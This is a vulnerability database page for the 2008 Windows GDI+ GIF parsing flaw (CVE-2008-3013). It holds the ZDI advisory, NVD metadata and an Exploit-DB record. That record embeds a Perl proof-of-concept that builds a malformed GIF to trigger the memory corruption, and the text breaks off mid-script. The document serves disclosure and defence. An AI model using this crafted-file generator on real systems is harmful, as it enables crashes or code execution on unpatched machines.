ZDI-08-056: Microsoft Windows GDI+ GIF Parsing Code Execution Vulnerability
2008-09-10T00:00:00
ID SECURITYVULNS:DOC:20487 Type securityvulns Reporter Securityvulns Modified 2008-09-10T00:00:00
Description
ZDI-08-056: Microsoft Windows GDI+ GIF Parsing Code Execution
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-056
September 9, 2008
-- CVE ID:
CVE-2008-3013
-- Affected Vendors:
Microsoft
-- Affected Products:
Microsoft Windows Server 2008
Microsoft Windows XP
Microsoft Windows Vista
Microsoft Windows Server 2003
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6358.
For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Windows XP, Server and Vista. User
interaction is required in that a user must open a malicious image file
or browse to a malicious website.
The specific flaws exist in the GDI+ subsystem when parsing maliciously
crafted GIF files. By supplying a malformed graphic control extension an
attacker can trigger an exploitable memory corruption condition.
Successful exploitation can result in arbitrary code execution under the
credentials of the currently logged in user.
-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:
-- Disclosure Timeline:
2008-02-07 - Vulnerability reported to vendor
2008-09-09 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Ivan Fratric
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any
recipient is prohibited. If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at postmaster@3com.com.
{"id": "SECURITYVULNS:DOC:20487", "bulletinFamily": "software", "title": "ZDI-08-056: Microsoft Windows GDI+ GIF Parsing Code Execution Vulnerability", "description": "ZDI-08-056: Microsoft Windows GDI+ GIF Parsing Code Execution \r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-08-056\r\nSeptember 9, 2008\r\n\r\n-- CVE ID:\r\nCVE-2008-3013\r\n\r\n-- Affected Vendors:\r\nMicrosoft\r\n\r\n-- Affected Products:\r\nMicrosoft Windows Server 2008\r\nMicrosoft Windows XP\r\nMicrosoft Windows Vista\r\nMicrosoft Windows Server 2003\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 6358. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Microsoft Windows XP, Server and Vista. User\r\ninteraction is required in that a user must open a malicious image file\r\nor browse to a malicious website.\r\n\r\nThe specific flaws exist in the GDI+ subsystem when parsing maliciously\r\ncrafted GIF files. By supplying a malformed graphic control extension an\r\nattacker can trigger an exploitable memory corruption condition.\r\nSuccessful exploitation can result in arbitrary code execution under the\r\ncredentials of the currently logged in user.\r\n\r\n-- Vendor Response:\r\nMicrosoft has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://www.microsoft.com/technet/security/bulletin/MS08-052.mspx\r\n\r\n-- Disclosure Timeline:\r\n2008-02-07 - Vulnerability reported to vendor\r\n2008-09-09 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Ivan Fratric\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nCONFIDENTIALITY NOTICE: This e-mail message, including any attachments,\r\nis being sent by 3Com for the sole use of the intended recipient(s) and\r\nmay contain confidential, proprietary and/or privileged information.\r\nAny unauthorized review, use, disclosure and/or distribution by any \r\nrecipient is prohibited. If you are not the intended recipient, please\r\ndelete and/or destroy all copies of this message regardless of form and\r\nany included attachments and notify 3Com immediately by contacting the\r\nsender via reply e-mail or forwarding to 3Com at postmaster@3com.com. ", "published": "2008-09-10T00:00:00", "modified": "2008-09-10T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20487", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2008-3013"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:27", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": 8.3, "vector": "NONE", "modified": "2018-08-31T11:10:27", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3013"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:20490", "SECURITYVULNS:DOC:20482", "SECURITYVULNS:VULN:9276"]}, {"type": "seebug", "idList": ["SSV:4020"]}, {"type": "zdi", "idList": ["ZDI-08-056"]}, {"type": "exploitdb", "idList": ["EDB-ID:6716"]}, {"type": "nessus", "idList": ["SMB_NT_MS08-052.NASL", "SMB_KB954593.NASL"]}, {"type": "mskb", "idList": ["KB954593"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801725", "OPENVAS:801725"]}], "modified": "2018-08-31T11:10:27", "rev": 2}, "vulnersScore": 8.3}, "affectedSoftware": []}
{"cve": [{"lastseen": "2021-02-02T05:35:14", "description": "gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed GIF image file containing many extension markers for graphic control extensions and subsequent unknown labels, aka \"GDI+ GIF Parsing Vulnerability.\"", "edition": 4, "cvss3": {}, "published": "2008-09-11T01:11:00", "title": "CVE-2008-3013", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3013"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:microsoft:ie:6", "cpe:/a:microsoft:report_viewer:2008", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/a:microsoft:office:2003", "cpe:/o:microsoft:windows_vista:*", "cpe:/a:microsoft:office:2007", "cpe:/a:microsoft:works:8.0", "cpe:/a:microsoft:powerpoint_viewer:2003", "cpe:/a:microsoft:sql_server:2005", "cpe:/a:microsoft:report_viewer:2005", "cpe:/a:microsoft:visio:2002", "cpe:/a:microsoft:sql_server_reporting_services:2000", "cpe:/o:microsoft:windows_xp:*", "cpe:/a:microsoft:office:xp", "cpe:/a:microsoft:digital_image_suite:2006", "cpe:/a:microsoft:forefront_client_security:1.0"], "id": "CVE-2008-3013", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3013", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_xp:*:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:report_viewer:2005:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2007:*:gold:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:6:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:powerpoint_viewer:2003:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2003:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:gold:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:xp:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:report_viewer:2008:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:works:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sql_server_reporting_services:2000:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:forefront_client_security:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:visio:2002:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:digital_image_suite:2006:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sql_server:2005:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2003:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2007:sp1:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T01:28:56", "description": "MS Windows GDI+ Proof of Concept (MS08-052) #2. CVE-2008-3013. Dos exploit for windows platform", "published": "2008-10-09T00:00:00", "type": "exploitdb", "title": "Microsoft Windows GDI+ - Proof of Concept MS08-052 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3013"], "modified": "2008-10-09T00:00:00", "id": "EDB-ID:6716", "href": "https://www.exploit-db.com/exploits/6716/", "sourceData": "------------------------------------------------------------------------------------------------------------\r\nOperating System: XP SP2\r\nGdiplus.dll Version: 5.1.3102.2180\r\n\r\nCredit:\r\n\r\nJohn Smith,\r\nEvil Fingers\r\n\r\nGIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt\r\n\r\nPoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt\r\n\r\nhttp://www.evilfingers.com/patchTuesday/PoC.php \r\n============================================================================================================\r\n\r\n#!/usr/bin/perl\r\n#\r\nuse strict;\r\n\r\nmy $gif = \r\n\r\n\"\\x47\\x49\\x46\\x38\\x39\\x61\". # GIF header\r\n\"\\x65\\x00\\x65\\x00\\xF7\\x0B\\x0B\". # Logical Screen Descriptor\r\n# COLOR Stream\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\". \r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\\x33\".\r\n\"\\x21\". ## Extension Introducer 0x21\r\n\"\\x2C\". ## Label 0x2C\r\n# Data Sub-blocks (1) Size: 21+1\r\n#0\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\".\r\n#1\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\x2C\\x21\\xEC\".\r\n\"\\x21\\xEC\".\r\n#2\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\".\r\n#3\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\".\r\n#4\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\x2C\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\".\r\n#5\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\".\r\n#6\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\".\r\n#7\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\x2C\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\".\r\n#8\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\".\r\n#9\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\".\r\n#10\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\x2C\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\".\r\n#11\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\".\r\n\"\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x21\\xEC\\x2C\\x00\\x00\\x00\\x00\\x0E\".\r\n\"\\x01\\x5A\".\r\n\"\\x00\". ## Terminator\r\n\"\\x21\". ## Extension Introducer 0x21\r\n\"\\x2C\". ## Label 0x2C\r\n# Data Sub-blocks (2) Size: EC+1\r\n#0\r\n\"\\xEC\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\".\r\n#1\r\n\"\\xEC\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\".\r\n#2\r\n\"\\xEC\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\".\r\n\"\\x62\\x61\\x62\\x61\\x62\\x61\\x62\\x61\\x